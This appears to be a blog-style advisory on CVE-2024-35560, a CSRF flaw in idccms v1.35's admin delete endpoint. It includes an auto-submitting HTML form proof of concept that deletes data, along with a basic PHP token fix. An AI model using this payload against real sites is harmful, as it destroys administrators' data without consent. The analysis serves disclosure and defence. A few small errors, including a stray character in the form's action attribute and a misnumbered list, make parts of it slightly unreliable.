CVE-2024-35560 - CSRF Vulnerability in idccms v1.35 – Full Exploit & Analysis

Date Reported: June 2024
Severity: High
Vulnerability Type: Cross-Site Request Forgery (CSRF)
Affected Software: idccms v1.35
Vulnerable Component: /admin/ca_deal.php?mudi=del&dataType=&dataTypeCN

Introduction

A serious security issue, known as CVE-2024-35560, was found in idccms v1.35—a popular content management system. The vulnerability lets attackers trick an authenticated administrator into unknowingly performing unwanted actions, like deleting crucial data, just by visiting a malicious website. In this post, you’ll learn how this CSRF flaw works, see sample exploit code, and get tips to stay protected.

What Is CSRF?

CSRF (Cross-Site Request Forgery) tricks a user’s browser into sending harmful requests to a site where they are logged in, often without their knowledge. This can lead to data loss, privilege escalation, or other damaging actions.

The idccms endpoint

/admin/ca_deal.php?mudi=del&dataType=&dataTypeCN

mudi=del: tells the script to perform a "delete" function.

- dataType & dataTypeCN: parameters used by the system, sometimes for specifying the type of data (can be left blank).

Because this endpoint doesn’t check for CSRF tokens or confirm the requesting party, attackers can craft fake requests that get executed with the admin’s privileges.

Admin is logged in at their idccms dashboard.

2. Attacker lures the admin to visit a malicious page—via email, chat link, or compromised website.
3. Malicious Page auto-sends a crafted request in the background to the idccms admin panel, instructing it to delete important data.

Exploit Proof-of-Concept (PoC)

Below is a simple HTML code that demonstrates how easy it is to exploit this bug. When the admin visits this page, it sends a deletion request to the vulnerable script.

<!-- CSRF PoC for CVE-2024-35560 - Deleting Data in idccms -->
<html>
  <body>
    <form id="csrf" action="http://target-site.com/admin/ca_deal.php?mudi=del&dataType=article&dataTypeCN="; method="POST">
      <input type="hidden" name="id" value="1">
      <!-- Add any other required parameters here -->
    </form>
    <script>
      document.getElementById('csrf').submit();
    </script>
  </body>
</html>

Note: Replace http://target-site.com with your actual CMS domain. You may need to adjust id, dataType, or other POST data as used by your installation.

Real-World References

- Official GitHub Repository of idccms
- CVE Record: CVE-2024-35560
- OWASP CSRF Cheat Sheet

Why Is This Dangerous?

- No User Interaction Needed: If an admin visits any malicious or compromised site while logged in, the exploit works automatically.

How to Fix

Immediate Fix:

Log out of the admin panel when not in active use.

Permanent Fix (Developer):

Here’s a very basic way to add CSRF protection to forms

// generate and store CSRF token
session_start();
if (!isset($_SESSION['csrf_token'])) {
  $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// HTML: include token in your forms
?>
<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>">
<?php

// On form handling (ca_deal.php):
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
  die('CSRF token validation failed.');
}
?>

Conclusion

CVE-2024-35560 is a powerful reminder that securing your admin backend isn’t optional. This CSRF bug in idccms v1.35 can lead to devastating admin-side attacks with little effort. If you use idccms, patch your instance, and educate all users about safe browsing habits. Always validate and protect every sensitive action!

Timeline

Published on: 05/22/2024 14:15:09 UTC
Last modified on: 03/25/2025 16:15:22 UTC